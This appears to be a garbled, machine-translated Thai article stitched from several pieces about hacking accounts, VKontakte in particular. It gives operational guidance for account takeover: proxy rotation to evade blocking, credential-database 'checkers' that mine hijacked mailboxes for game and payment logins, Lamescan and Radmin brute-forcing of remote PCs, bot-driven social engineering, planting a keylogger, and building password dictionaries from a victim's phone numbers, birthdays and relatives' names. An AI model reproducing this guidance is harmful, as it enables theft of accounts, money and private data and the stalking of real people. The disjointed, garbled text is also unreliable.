คอมพิวเตอร์ หน้าต่าง อินเทอร์เน็ต

Bruteforcer Vkontakte - VKFucker. ตรวจสอบรายละเอียดของแอปพลิเคชัน Bruteforce VKontakte Bruteforce VKontakte

ทีมงาน ][ แต่ละคนมีความชอบของตนเองเกี่ยวกับซอฟต์แวร์และยูทิลิตี้สำหรับ
การทดสอบปากกา หลังจากปรึกษาหารือกัน เราพบว่าตัวเลือกนั้นแตกต่างกันมากจนคุณเลือกได้
สร้างโปรแกรมที่ได้รับการพิสูจน์แล้วสำหรับสุภาพบุรุษตัวจริง ว่าและ
ตัดสินใจแล้ว. เพื่อไม่ให้เกิดการผสมรวมกันเราจึงแบ่งรายการทั้งหมดออกเป็นหัวข้อ - และใน
คราวนี้เราจะพูดถึงยูทิลิตี้สำหรับเลือกรหัสผ่านสำหรับบริการต่างๆ

บรูตัส AET2

แพลตฟอร์ม: วินโดวส์

การเปิดตัวครั้งสุดท้ายของโปรแกรมคือในปี 2543 Toolza ไม่มีอย่างเป็นทางการมานานแล้ว
เว็บไซต์. แต่ในขณะเดียวกัน บรูตัส AET2ยังคงเป็นหนึ่งในความเร็วและ
brute-forcers ขั้นสูงสำหรับอินเทอร์เน็ตโปรโตคอลหลัก หากคุณจำเป็นต้องเลือก
รหัสผ่านสำหรับ HTTP (ในหน้าที่ใช้การอนุญาตโดย
เข้าสู่ระบบ/รหัสผ่าน) บริการเว็บโดยพลการที่มีการให้สิทธิ์ผ่านแบบฟอร์ม อีเมล
บัญชี ไฟล์ หรือเซิร์ฟเวอร์ Telnet ทราบ: บรูตัส- ตัวเลือกที่ยอดเยี่ยม

โดยทั่วไปในการเดารหัสผ่าน คุณต้องระบุโฮสต์และพอร์ตของบริการ เลือก
โปรโตคอล กำหนดจำนวนเธรดที่จะใช้ (สูงสุด - 60) และ
หมดเวลา. เพื่อวัตถุประสงค์ในการไม่เปิดเผยตัวตน คุณสามารถเชื่อมต่อถุงเท้าหรือผู้รับมอบฉันทะ ขึ้นอยู่กับ
โปรโตคอลยังระบุพารามิเตอร์เพิ่มเติมจำนวนหนึ่ง ตัวอย่างเช่น เพื่อเลือก
รหัสผ่านในบางไซต์ (ประเภทกำลังดุร้าย - แบบฟอร์ม HTTP) คุณต้องระบุวิธีการ
(POST หรือ GET) กำหนดพารามิเตอร์ของแบบฟอร์ม (Brutus มีเครื่องมือง่ายๆ
เพื่อวิเคราะห์) และหากจำเป็น ให้ปลอมแปลงคุกกี้โดยเปิดใช้งาน
ตัวเลือกที่เกี่ยวข้อง

การเลือกทำได้สองวิธี: ตามพจนานุกรมและโปรแกรมมี
ยูทิลิตี้ในตัวหลายตัวสำหรับการทำงานกับรายการรหัสผ่านจำนวนมากหรือด้วย
ใช้รหัสผ่านที่สร้างขึ้นอย่างโง่เขลา ในกรณีหลังนี้มีความจำเป็น
กำหนดตัวอักษรที่จะใช้ในการผ่าน

กำลังดุร้าย (มาจากวลีภาษาอังกฤษ: กำลังดุร้าย) คือการโจมตีของแฮ็กเกอร์ประเภทหนึ่ง - วิธีการแฮ็กบัญชีในระบบคอมพิวเตอร์บริการชำระเงิน / ธนาคารและเว็บไซต์ผ่านการเลือกรหัสผ่านและการเข้าสู่ระบบโดยอัตโนมัติ

กำลังดุร้ายขึ้นอยู่กับวิธีการทางคณิตศาสตร์ที่มีชื่อเดียวกัน (แรงเดรัจฉาน) ซึ่งพบคำตอบที่ถูกต้อง - จำนวนจำกัดหรือชุดสัญลักษณ์ - พบได้โดยการเรียงลำดับตามตัวเลือกต่างๆ ในความเป็นจริง แต่ละค่าจากชุดคำตอบที่เป็นไปได้ (โซลูชัน) ที่กำหนดจะได้รับการตรวจสอบความถูกต้อง

หลักการทำงานของกำลังดุร้าย

แฮ็กเกอร์เขียนโปรแกรมพิเศษสำหรับเดารหัสผ่านหรือใช้โซลูชันสำเร็จรูปของเพื่อนร่วมงาน สามารถมุ่งเน้นไปที่บริการอีเมล เว็บไซต์ เครือข่ายสังคมเฉพาะ (เช่น ออกแบบมาเพื่อแฮ็กทรัพยากรเฉพาะ) ขั้นตอนต่อไปคือการเตรียมการสำหรับการแฮ็ก ประกอบด้วยขั้นตอนต่อไปนี้:

  1. รวบรวมรายชื่อพร็อกซี

เพื่อซ่อนที่อยู่ IP ที่แท้จริงของคอมพิวเตอร์ที่จะทำการโจมตี และเพื่อป้องกันการบล็อกจากไซต์ที่จำเป็นต้องแฮ็กบัญชี การเชื่อมต่ออินเทอร์เน็ตจึงได้รับการกำหนดค่าผ่านพร็อกซีเซิร์ฟเวอร์

การค้นหาที่อยู่/พอร์ตของพร็อกซีจะดำเนินการในพร็อกซีแกร็บเบอร์ (Proxy Grabber) ยูทิลิตีนี้แยกข้อมูลทั้งหมดสำหรับการเชื่อมต่อกับเซิร์ฟเวอร์ตัวกลางจากไซต์ที่ให้พร็อกซี (ระบุไว้ในรายการ) โดยอิสระ กล่าวอีกนัยหนึ่งพร็อกซีจะถูกรวบรวม

ฐานผลลัพธ์จะถูกบันทึกในไฟล์ข้อความแยกต่างหาก จากนั้นที่อยู่เซิร์ฟเวอร์ทั้งหมดที่มีอยู่ในนั้นจะถูกตรวจสอบความสามารถในการใช้งานในตัวตรวจสอบพร็อกซี บ่อยครั้งที่โปรแกรมที่ออกแบบมาสำหรับการขุดพร็อกซีอัตโนมัติจะรวมฟังก์ชันของทั้งตัวจับและตัวตรวจสอบ

เป็นผลให้เราได้รับรายการพร็อกซีที่เสร็จสิ้นแล้วในรูปแบบของรายการ IP/พอร์ต ซึ่งบันทึกไว้ในไฟล์ txt (คุณจะต้องใช้เมื่อตั้งค่าโปรแกรมกำลังเดรัจฉาน)

  1. ค้นฐานเดรัจฉาน

จำเป็นต้องเชื่อมต่อพจนานุกรมกับกำลังดุร้าย - ชุดรหัสผ่านและการเข้าสู่ระบบบางชุด - ซึ่งจะแทนที่ในแบบฟอร์มการเข้าสู่ระบบ นอกจากนี้ รายการพร็อกซียังมีรูปแบบของรายการในไฟล์ข้อความธรรมดา (.txt) เช่นเดียวกับรายการพร็อกซี พจนานุกรมเหล่านี้ยังเป็นฐานข้อมูลอีกด้วย ถูกเผยแพร่ผ่านฟอรัมของแฮ็กเกอร์ ไซต์ และการโฮสต์ไฟล์ "ช่างฝีมือ" ที่มีประสบการณ์มากกว่าสร้างมันขึ้นมาเองและมอบให้กับทุกคนโดยเสียค่าธรรมเนียม ยิ่งฐานมีขนาดใหญ่ (จำนวนชุดค่าผสม การเข้าสู่ระบบ บัญชี) ยิ่งดี (สำหรับแฮ็กเกอร์) โอกาสที่แฮ็กจะประสบความสำเร็จก็ยิ่งมากขึ้นเท่านั้น

  1. การตั้งค่ากำลังเดรัจฉาน

โหลดรายการพร็อกซีแล้ว โปรแกรมการเลือกจะเปลี่ยนพร็อกซีโดยอัตโนมัติเพื่อให้เว็บเซิร์ฟเวอร์ตรวจไม่พบการโจมตี และตามด้วยแหล่งที่มา (โฮสต์) ของการโจมตี

มีการเชื่อมต่อพจนานุกรมของชุดรหัสผ่าน/การเข้าสู่ระบบ จำนวนเธรดถูกตั้งค่า - จำนวนชุดค่าผสมที่จะตรวจสอบในเวลาเดียวกัน คอมพิวเตอร์ที่ทรงพลังพร้อมอินเทอร์เน็ตความเร็วสูงสามารถรองรับสตรีมได้ 120-200 สตรีมอย่างมั่นใจ (นี่คือค่าที่เหมาะสมที่สุด) ความเร็วของเดรัจฉานขึ้นอยู่กับการตั้งค่านี้โดยตรง ตัวอย่างเช่น หากคุณตั้งค่าเพียง 10 เธรด การเลือกจะช้ามาก

  1. เปิดตัวกำลังดุร้าย

โปรแกรมบันทึกความพยายามในการแฮ็กที่ประสบความสำเร็จ โดยจะบันทึกบัญชีที่ถูกแฮ็ก (รหัสผ่าน/การเข้าสู่ระบบ) ลงในไฟล์ ระยะเวลาของขั้นตอนการคัดเลือกมีตั้งแต่หลายชั่วโมงไปจนถึงหลายวัน ในขณะเดียวกันก็ไม่ได้มีประสิทธิภาพเสมอไปเนื่องจากความเสถียรของการเข้ารหัสสูงของข้อมูลการเข้าสู่ระบบหรือการใช้มาตรการป้องกันอื่น ๆ ในส่วนของการโจมตี

ประเภทของกำลังดุร้าย

แฮ็คส่วนบุคคล

การค้นหาบัญชีเฉพาะ - ในโซเชียลเน็ตเวิร์กบนบริการอีเมล ฯลฯ ผ่านหรืออยู่ในขั้นตอนของการสื่อสารเสมือนจริง ผู้โจมตีจะทำการเข้าสู่ระบบจากเหยื่อเพื่อเข้าถึงไซต์ จากนั้นเขาถอดรหัสรหัสผ่านโดยใช้วิธีการเดรัจฉาน: เขาระบุที่อยู่ของทรัพยากรบนเว็บและการเข้าสู่ระบบที่แยกออกมาด้วยกำลังเดรัจฉาน เชื่อมต่อพจนานุกรม

โอกาสที่จะถูกแฮ็กนั้นต่ำ เช่น เมื่อเทียบกับการโจมตี XSS แบบเดียวกัน สามารถทำได้สำเร็จหากเจ้าของบัญชีใช้รหัสผ่าน 6-7 อักขระด้วยชุดอักขระธรรมดา มิฉะนั้นจะใช้เวลาหลายปี - หลายสิบหลายร้อยปีตามการคำนวณของสูตรการค้นหาทางคณิตศาสตร์เพื่อ "คลี่คลาย" ตัวเลือกที่เสถียรกว่า 12.15, 20 ตัวอักษร, ตัวเลขและอักขระพิเศษ

บรูตัส/เช็ค

ฐานข้อมูลที่มีการเข้าสู่ระบบ / รหัสผ่านจากกล่องจดหมายของบริการอีเมลหนึ่ง (เช่น mail.ru) หรืออื่น ๆ เชื่อมต่อกับเดรัจฉาน และมีการใช้รายการพร็อกซีเพื่อปกปิดโฮสต์ (เนื่องจากบริการเว็บอีเมลตรวจพบการโจมตีอย่างรวดเร็วจากคำขอหลายรายการจากที่อยู่ IP เดียวกัน)

ตัวเลือกเดรัจฉานประกอบด้วยรายการคำหลัก (โดยปกติจะเป็นชื่อไซต์) ซึ่งเป็นจุดอ้างอิงที่เขาจะค้นหาข้อมูลการเข้าสู่ระบบในกล่องจดหมายที่ถูกแฮ็ก (เช่น: steampowered, worldoftanks, 4game, VK) หรือแหล่งข้อมูลทางอินเทอร์เน็ตเฉพาะ

ผู้ใช้ที่ลงทะเบียนในเกมออนไลน์ โซเชียลเน็ตเวิร์ก หรือฟอรัม ตามที่คาดไว้ จะระบุอีเมล (กล่องจดหมาย) ของเขา บริการเว็บส่งข้อความไปยังที่อยู่ที่ระบุพร้อมข้อมูลการเข้าสู่ระบบและลิงค์เพื่อยืนยันการลงทะเบียน มันคือตัวอักษรเหล่านี้ที่เดรัจฉานกำลังมองหาเพื่อดึงข้อมูลการเข้าสู่ระบบและรหัสผ่านออกจากพวกเขา

กด "START" และแคร็กเกอร์จะเริ่มใช้กำลังดุร้าย มันทำงานตามอัลกอริทึมต่อไปนี้:

  1. โหลดล็อกอิน/รหัสผ่านไปยังอีเมลจากฐานข้อมูล
  2. ตรวจสอบการเข้าถึงหรือ "ตรวจสอบ" (ให้สิทธิ์โดยอัตโนมัติ): หากเป็นไปได้ที่จะลงชื่อเข้าใช้บัญชี ให้บวกหนึ่งรายการในคอลัมน์ที่ดี (หมายความว่าพบอีเมลที่ใช้งานได้อีกฉบับ) และเริ่มดู (ดูย่อหน้าต่อไปนี้) หากไม่มีการเข้าถึงจะทำให้ไม่ดี (ไม่ดี)
  3. ใน "guds" ทั้งหมด (อีเมลที่เปิดอยู่) กำลังดุร้ายจะสแกนตัวอักษรตามคำขอที่แฮ็กเกอร์กำหนด - นั่นคือค้นหาข้อมูลเข้าสู่ระบบ / รหัสผ่านไปยังไซต์และระบบการชำระเงินที่ระบุ
  4. เมื่อพบข้อมูลที่ต้องการ ระบบจะคัดลอกและป้อนลงในไฟล์แยกต่างหาก

ดังนั้นจึงมีการ "หักหลัง" บัญชีจำนวนมากตั้งแต่หลักสิบถึงหลักร้อย ผู้โจมตีกำจัด "ถ้วยรางวัล" ที่ได้รับตามดุลยพินิจของเขาเอง - การขาย การแลกเปลี่ยน การรวบรวมข้อมูล การขโมยเงิน

การแฮ็คคอมพิวเตอร์ระยะไกล

กำลังดุร้ายร่วมกับเครื่องมือแฮ็กอื่น ๆ ใช้เพื่อเข้าถึงพีซีของเหยื่อที่ป้องกันด้วยรหัสผ่านจากระยะไกลผ่านช่องทางอินเทอร์เน็ต

การโจมตีประเภทนี้ประกอบด้วยขั้นตอนต่อไปนี้:

  1. มีการค้นหาเครือข่าย IP ซึ่งจะทำการโจมตีคอมพิวเตอร์ของผู้ใช้ ช่วงที่อยู่นำมาจากฐานข้อมูลพิเศษหรือผ่านโปรแกรมพิเศษ เช่น IP Geo ในนั้นคุณสามารถเลือกเครือข่าย IP สำหรับเขต ภูมิภาค และแม้แต่เมืองที่ต้องการได้
  2. ช่วง IP ที่เลือกและพจนานุกรมการเลือกถูกตั้งค่าในการตั้งค่าของ Lamescan brute force (หรือเทียบเท่า) ซึ่งมีไว้สำหรับการล็อกอินระยะไกล/รหัสผ่าน brute force เมื่อเปิดตัวแล้ว Lamescan จะทำสิ่งต่อไปนี้:
  • ดำเนินการเชื่อมต่อกับแต่ละ IP จากช่วงที่ระบุ
  • หลังจากสร้างการเชื่อมต่อแล้ว จะพยายามเชื่อมต่อกับโฮสต์ (PC) ผ่านพอร์ต 4899 (แต่อาจมีตัวเลือกอื่น)
  • หากพอร์ตเปิดอยู่: พยายามเข้าถึงระบบ ใช้กำลังดุร้ายเมื่อได้รับแจ้งให้ป้อนรหัสผ่าน หากสำเร็จจะบันทึกที่อยู่ IP ของโฮสต์ (คอมพิวเตอร์) และข้อมูลการเข้าสู่ระบบในฐานข้อมูล

  1. แฮ็กเกอร์เปิดยูทิลิตี้ Radmin ซึ่งออกแบบมาเพื่อจัดการพีซีระยะไกล ตั้งค่าพิกัดเครือข่ายของเหยื่อ (IP, ล็อกอินและรหัสผ่าน) และควบคุมระบบได้อย่างเต็มที่ - เดสก์ท็อป (แสดงเป็นภาพบนหน้าจอคอมพิวเตอร์ของแคร็กเกอร์), ไดเร็กทอรีไฟล์, การตั้งค่า

โปรแกรมสำหรับเดรัจฉาน

กำลังดุร้ายแบบคลาสสิกซึ่งเป็นหนึ่งในคนแรกๆ อย่างไรก็ตาม มันไม่ได้สูญเสียความเกี่ยวข้องและแข่งขันกับโซลูชั่นใหม่ๆ มีอัลกอริทึม brute-force ที่ชาญฉลาดและรองรับโปรโตคอลอินเทอร์เน็ตที่สำคัญทั้งหมด - TCP / IP, POP3, HTTP และอื่น ๆ สามารถปลอมคุกกี้ได้ ดุร้ายด้วยพจนานุกรมและสร้างรหัสผ่านด้วยตัวเอง

ตรวจสอบเดรัจฉานที่มีประสิทธิภาพ มีฟังก์ชั่นเพิ่มเติมสำหรับการทำงานกับฐานข้อมูล (การตรวจสอบ การเรียงลำดับตามโดเมน) รองรับพร็อกซีประเภทต่างๆ ตรวจสอบประสิทธิภาพ สแกนกล่องจดหมายตามการตั้งค่า เช่น วันที่ คำสำคัญ ที่อยู่ ข้อความที่ยังไม่ได้อ่าน สามารถดาวน์โหลดจดหมายจาก Mail.ru และ Yandex

Appnimi รหัสผ่าน Unlocker

โปรแกรมสำหรับเลือกรหัสผ่านสำหรับไฟล์บนเครื่องคอมพิวเตอร์โดยใช้กำลังดุร้าย ช่างเป็นม้าทำงาน โปรแกรมเวอร์ชันฟรีให้คุณเดารหัสผ่านได้ไม่เกิน 5 ตัวอักษร คุณสามารถอ่านเกี่ยวกับวิธีการติดตั้งและใช้ Appnimi Password Unlocker

ใช่มี โดยทั่วไปมีโปรแกรมดังกล่าวมากมาย

และเราต่อต้านโปรแกรมดังกล่าว

แต่เนื่องจากมีความต้องการบางอย่างสำหรับโปรแกรมดังกล่าว ลองมาดูกันว่าโปรแกรมใดที่ "ค่อนข้าง" ถูกกฎหมาย และโปรแกรมใดดีกว่าที่จะไม่ใช้เลย
ในขั้นต้นมีตั้งแต่การสร้าง VKontakte เช่นโปรแกรมเช่นแอปพลิเคชั่นเดรัจฉาน
โปรแกรมดังกล่าวมีส่วนร่วมในการแจงนับรหัสผ่านทั้งหมดที่มีอยู่ สำหรับสิ่งนี้ทั้งอัลกอริทึมทั่วไปที่มีการแจงนับทีละขั้นตอนและที่เรียกว่า ตารางสายรุ้งซึ่งกระจายค่าแบบสุ่มตามการกระจายที่ดีที่สุด - ตามที่ผู้เขียนโปรแกรมล่าสุดคิดขึ้น การกระจายแบบสุ่มสามารถลดเวลาในการค้นหารหัสผ่านได้เนื่องจากการค้นหาจะไม่เริ่มจากจุดเริ่มต้น แต่จะสุ่มและโดยเฉลี่ยแล้วเส้นทางไปยังตัวอักษรที่ต้องการจะสั้นลง
เราไม่แนะนำให้ใช้โปรแกรมเดรัจฉานบังคับเลยมีโปรแกรมแฮ็ค VKontakte มากมาย ดังนั้นจึงเป็นการดีกว่าที่จะไม่ใช้ "การเจาะ" ที่หยาบคายในหน้า นอกจากนี้ ผู้ใช้เองอาจสงสัยบางอย่างและลบหน้าโดยเริ่มต้นใหม่หรือเปลี่ยนที่อยู่ และนอกจากนี้, ผู้ดูแลระบบ VK จะบล็อกคุณด้วย IP และอาจเริ่มดำเนินการทางกฎหมายสำหรับการโจมตีเซิร์ฟเวอร์การเข้าสู่ระบบและการละเมิดความเสถียรรวมถึงความพยายามที่จะเจาะการติดต่อของผู้อื่น

ดังนั้นโปรแกรมแฮ็ค VKontakte โดยใช้กำลังดุร้ายจึงผิดกฎหมาย มีอะไรอีกบ้าง?

โดยทั่วไปคุณจะมีเวลาดาวน์โหลดโปรแกรมสำหรับแฮ็ค VKontakte ได้ฟรี มีหลายคนจริงๆ มาดูกันว่าวิธีทางกฎหมายในการเจาะเพจของคนอื่นมีอะไรบ้าง
ประการแรกนี่คือแอปพลิเคชัน แอปพลิเคชันมีข้อมูลจำนวนมากเกี่ยวกับผู้ใช้ โดยทั่วไปแล้ว ผู้ใช้จะไม่อ่านข้อความแจ้งที่แจ้งก่อนเปิดแอปพลิเคชัน และที่นั่น มีเพียงแอปพลิเคชันเท่านั้นที่ได้รับสิทธิ์เข้าถึงข้อมูลส่วนตัว รายชื่อเพื่อน วอลล์ และอื่นๆ อย่างเต็มรูปแบบ แน่นอนว่าข้อความส่วนตัวยังไม่เป็นที่รู้จักในแอปพลิเคชัน แต่ เมื่อทราบข้อมูลส่วนตัวจำนวนมหาศาลที่ก่อนหน้านี้ถูกซ่อนอยู่หลังการตั้งค่าความเป็นส่วนตัว คุณจะสามารถดึงกลลวงทางวิศวกรรมสังคมออกมา และมีส่วนร่วมในการ "หลอกล่อ" ข้อมูลเกี่ยวกับผู้ใช้จากเพื่อนสนิทของเขา
อย่างไรก็ตามสิ่งนี้ไม่ได้ถูกกฎหมายทั้งหมด - ปัญหาอาจเกิดขึ้นเนื่องจากผู้ใช้ ให้เดาว่าเป็นแอปพลิเคชั่นที่ "รั่วไหล" ข้อมูล แน่นอนว่าเขาจะยื่นเรื่องฟ้องและแอปพลิเคชันจะถูกบล็อกโดยทั่วไปแล้ววิธีการนี้ดี แต่ตกอยู่ภายใต้ความสงสัยอย่างรวดเร็ว ใช่และ การสมัครยังคงยุ่งยาก
ไปข้างหน้า

ปกติฉันจะดาวน์โหลดโปรแกรมแฮ็คหน้า VKontakte ได้ที่ไหนซึ่งจะถูกกฎหมาย

ก่อนอื่นมากำหนดกัน - เราพอใจกับวิศวกรรมสังคมเท่านั้น โดยหลักการแล้ว เมื่อใช้อย่างเหมาะสม วิศวกรรมสังคมจะช่วยให้เราได้รับข้อมูลทั้งหมดที่เราต้องการจากผู้ใช้โดยไม่ต้องแฮ็กเพจของเขา แม้ว่าคุณจะสามารถเข้าถึงเพจได้อย่างเต็มที่
ดังนั้นโปรแกรมโซเชียลสำหรับการแฮ็ค VKontakte ที่คุณสามารถดาวน์โหลดได้ฟรีคืออะไร?
ก่อนอื่นควรสังเกตบ็อต Brobot
แน่นอนว่าการใช้มันเพื่อแฮ็คนั้นเป็นวิธีการที่ค่อนข้างแปลกในการจัดการโปรแกรมนี้ แต่โดยหลักการแล้ว ฟังก์ชั่นที่จำเป็นและเพียงพอสำหรับการแฮ็ค
เราสามารถ "ตั้งค่า" บอทให้กับผู้ใช้เอง กับเพื่อน โดยใช้ความเป็นไปได้ในการเพิ่มเพื่อนและการติดต่อส่วนตัว มาเชื่อมต่อบอท III เพื่อสนทนากัน โดยตั้งค่าให้เป็นเสียงที่เป็นมิตรที่สุด และหลังจากนั้น คุณสามารถเก็บเกี่ยวผลประโยชน์ เรียนรู้สิ่งที่น่าสนใจมากมายเกี่ยวกับผู้ใช้ในประวัติการติดต่อที่ Brobot บันทึกไว้
หลังจากนั้นคุณสามารถส่งไปยังผู้ใช้ เช่น คีย์ล็อกเกอร์ และจับสิ่งที่เขาเขียนถึงผู้ใช้รายอื่น- อันที่จริง คุณไม่จำเป็นต้องดาวน์โหลดโปรแกรมพิเศษสำหรับการแฮ็ค VKontakte หลังจากนั้น แค่ติดตามผู้ใช้ก็เพียงพอแล้ว แต่คุณสามารถทำได้โดยไม่ต้องใช้คีย์ล็อกเกอร์!

โปรแกรมแฮ็ค VKontakte เช่น Brobot ช่วยเราได้อย่างไร?

ก่อนอื่นเรามานิยามกันก่อนว่าอะไร Brobot ไม่แฮ็คเพจ กิจกรรมทั้งหมดของเราถูกกฎหมายอย่างแน่นอน ไม่มีใครสามารถฟ้องร้องเราได้ ไม่มีใครสามารถปิดกั้นเราได้ ทุกอย่างยุติธรรมอย่างแน่นอน (ในขอบเขตที่เราต้องการ)
ในความเป็นจริงเราเริ่มต้นหลาย ๆ หน้า (เป็นการดีกว่าที่จะซื้อไม่ จำกัด ทันทีซึ่งรับประกันว่าจะเพิ่มปริมาณข้อมูลที่ได้รับ) และจากนั้นเราได้สื่อสารกับผู้ใช้ซึ่ง ช่วยให้เรารู้ทัศนคติของเขาต่อบุคลิกที่หลากหลายรวมถึงรับภาพเหมือนของเขาเพื่อนญาติของเขาและอื่น ๆ - และนี่คือสิ่งที่เราต้องการและในอนาคต คุณสามารถสร้างการกระทำที่น่าสนใจและซับซ้อนยิ่งขึ้นได้ และทั้งหมดนี้ขึ้นอยู่กับความต้องการและจินตนาการของคุณ
โปรแกรม Brobot จะกลายเป็นผู้ช่วยที่ดีและทีมสนับสนุนของ Brobot ซึ่งพร้อมให้บริการเกือบตลอดเวลา จะตอบคำถามทางเทคนิคทั้งหมดของคุณ

กำลังดุร้าย - กำลังดุร้าย, การแฮ็คกำลังดุร้าย
ในบทความ "" มีการกล่าวว่าเป็นไปไม่ได้ที่จะแฮ็ค VK ด้วยกำลังเดรัจฉาน (โปรแกรม)
นี่ไม่เป็นความจริงทั้งหมด แต่ยังมีช่องโหว่ ...
ด้านล่างนี้เป็นสคริปต์ที่ใช้งานได้ แต่ก่อนอื่น…

ที่ด้านล่างของบทความ - โปรแกรมฟรีสำหรับสร้างพจนานุกรมเดรัจฉานและรายการ "รหัสผ่านล็อคด้านบน"

ฉันจองล่วงหน้าว่าเรากำลังพูดถึง "กำลังดุร้าย" แบบคลาสสิกโดยไม่มีอัลกอริทึม PBKDF2 ใด ๆ โดยไม่ต้องแยกวิเคราะห์แฮชเพราะ ในระดับครัวเรือน นี่เป็นงานที่หนักหนาสาหัส

มีหลายโปรแกรม "สำหรับการแฮ็ก VK ด้วยกำลังดุร้าย" บนเครือข่าย

อันไหนให้เลือก? อะไรจะช่วยได้ (โดยไม่ทำอันตรายต่อฉัน)?
- ไม่มี

บัญชี VK แต่ละบัญชีต้องการวิธีการส่วนตัวและโปรแกรมเทมเพลตจากเครือข่ายล้วนเป็นเรื่องไร้สาระ การหย่าร้าง เรื่องไร้สาระ

ตอนนี้คุณจะเข้าใจว่าทำไม ส่วนทางคณิตศาสตร์โดยสังเขป

ความยาวขั้นต่ำของรหัสผ่าน VK คือ 6 ตัวอักษร

รหัสผ่านต้องมี:
ตัวเลข(0-9 - 10 ตัวเลือก),
ตัวอักษร(a-z - 26 ในภาษาละติน)
ตัวพิมพ์ใหญ่(A-Z คือ 26)

ผลรวมสำหรับแต่ละสัญลักษณ์ - 10+26+26=62 (!) ตัวเลือก ดังนั้นจำนวนชุดค่าผสมสำหรับ:
รหัสผ่าน 6 ตัว - 56,800,235,584 (56.8 พันล้าน)
รหัสผ่าน 7 ตัว - 3,521,614,606,208 (3.5 ล้านล้าน)
รหัสผ่าน 8 ตัวอักษร - 218 340 105 584 896 (218 ล้านล้าน)
รหัสผ่าน 9 ตัว -13 537 086 546 263 600

เราไม่ทราบความยาวของรหัสผ่าน ดังนั้นเราจะต้องใช้อักขระอย่างน้อย 6-8 ตัว
ทั้งหมด: 6+7+8 ตัวอักษร = 221,918,520,426,688 (222 ล้านล้าน) ตัวเลือก

สมมติว่าคุณมีคอมพิวเตอร์ที่ค่อนข้างดี แต่มีคำถามเกิดขึ้น - เซิร์ฟเวอร์ VK สามารถส่งคำขอได้กี่คำขอ
คอมพิวเตอร์ที่บ้านของคุณเร็วแค่ไหน?

มาคำนวณกัน. ในการดำเนินการนี้ ให้เปิดพรอมต์คำสั่ง (เริ่ม - อุปกรณ์เสริม - พร้อมรับคำสั่ง หรือเรียกใช้กระบวนการ cmd.exe)
เราขับรถตามคำสั่ง เราได้รับการตอบกลับจากเซิร์ฟเวอร์

"ตอบกลับจาก .....time 134ms" (นี่คือของฉัน เวลาของคุณอาจแตกต่างออกไป)

เวลา Ping คือเวลาที่สัญญาณใช้ในการเดินทางจากเครื่องของเราไปยังเซิร์ฟเวอร์และย้อนกลับ

มี 1,000 มิลลิวินาที (ms) ในหนึ่งวินาที ดังนั้น
อัตราการดุร้ายจากเครื่องของคุณ (คำขอ / วินาที) จะเท่ากับ 1,000 / เวลาตอบสนอง
ในกรณีของฉัน 1,000/134ms = 7.4 คำขอ (รหัสผ่าน) ต่อวินาที

จะใช้เวลานานแค่ไหนในการแยกแยะรหัสผ่านสำหรับ VK?

ฉันขอเตือนคุณว่าเรากำลังทำซ้ำตัวเลือกรหัสผ่านมากกว่า 221,918,520,426,688 (222 ล้านล้าน) ตัวเลือก

ดังนั้นเพื่อที่จะทราบว่าเราจะถอดรหัสรหัสผ่าน VK ด้วยกำลังดุร้ายเท่าใดเราจึงหารจำนวนด้วยความเร็วเช่น

221918520426688 รหัสผ่าน / 7.4 รหัสผ่านต่อวินาที = 29737081737176 วินาที = 495618028953 นาที = 8260300483 ชั่วโมง = 344179187 วัน = 942957 ปี

บทสรุป:โปรแกรมจริงสำหรับการแฮ็ก VK สามารถรับรหัสผ่านด้วยกำลังดุร้ายเป็นเวลา 94,000 ปี

คำถาม: แล้ววิดีโอบน YouTube ล่ะ ซึ่งโปรแกรมมหัศจรรย์ฉายหน้า VK ในไม่กี่นาที / ชั่วโมง?
ฉันตอบ: นี่คือการหลอกลวงที่สร้างขึ้นเพื่อแพร่ระบาดในคอมพิวเตอร์ของคุณเพื่อขโมยข้อมูลของคุณเอง ไม่มากไม่น้อย.

คุณสามารถเร่งกระบวนการค้นหาได้อย่างมาก!
สำหรับสิ่งนี้คุณต้อง:
1. เพิ่มพลังการประมวลผล ตัวอย่างเช่นแพร่เชื้อคอมพิวเตอร์ของผู้อื่น 1,000,000 เครื่องและพร้อมกันเดรัจฉาน VK จากพวกเขาทั้งหมด (ตลกแล้ว)
๒. ย่อพจนานุกรมเดรัจฉานให้สั้นลง เช่น สองพัน (ตามหลักวิศวกรรมสังคม)

วิธีการทำเดรัจฉานพจนานุกรม?
1. ปากกาในโปรแกรม notepad (notepad.exe)
2. Prog “brute generator” (ลิงก์ที่ด้านล่างของบทความ)

สัตว์เดรัจฉานนี้ - พจนานุกรมเต็มไปด้วยตัวเลือกที่แท้จริง

ตัวจริงคือคนที่อย่างน้อยก็เชื่อมโยงกับผู้ที่ถูกแฮ็ก:

-โทรศัพท์(เขา, ญาติ, เพื่อนของเขา)
ตัวอย่าง- ตัวเลขที่มี + 7s, 8s โดยไม่มี 8s - ไม่ค่อยเจอ

- วันเดือนปีเกิด(เขา, ญาติของเขา, ญาติของเขา)
ตัวอย่าง- (วันเดียวกัน) 010118, 01012018, 20180101, 180101 - เจอบ่อย

- ชื่อคนที่รัก
ตัวอย่าง- SashaMaria, MariaIvanova, SaNoMaIv - เฉลี่ย

ชื่อไซต์ (หรือนามสกุล) ในเค้าโครงอื่น
ตัวอย่างหากคุณพิมพ์คำว่า "vkontakte" บนเค้าโครงภาษารัสเซีย คุณจะได้รับ - "mlshtefleu" - รูปแบบดังกล่าวพบได้บ่อยในทุกไซต์

- รายการรหัสผ่านของ Loch สำหรับเดรัจฉาน(รายการรหัสผ่านที่พบบ่อยที่สุดในเครือข่าย - ลิงก์ที่ท้ายบทความ)

ใช้เวลานานแค่ไหนในการเขียนพจนานุกรม?ไม่จริง - ครึ่งชั่วโมงก็เพียงพอสำหรับดวงตา ใครบอกว่ามันจะง่าย?

สมมติว่าเรามีพจนานุกรมที่สร้างโดยเดรัจฉานและโปรแกรมที่ใช้งานได้สำหรับการเลือกรหัสผ่าน VK (หรือการป้อนด้วยตนเองในพจนานุกรม)

มีปัญหาสำคัญประการหนึ่ง - ระบบป้องกันเซิร์ฟเวอร์

อันที่จริงแล้ว การรบกวนของมันอยู่ที่ข้อเท็จจริงที่ว่าด้วยคำขอที่บ่อยเกินไป เซิร์ฟเวอร์จะบล็อก (ชั่วคราว) IP ของคุณอย่างโง่เขลา นอกจากนี้ หากคุณทำงานกับ VK ผ่านแบบฟอร์มอินพุตมาตรฐาน (HTML \ FORM) หลังจากพยายามไม่สำเร็จ 3 ครั้ง VK จะขอให้คุณป้อนแคปต์ชา

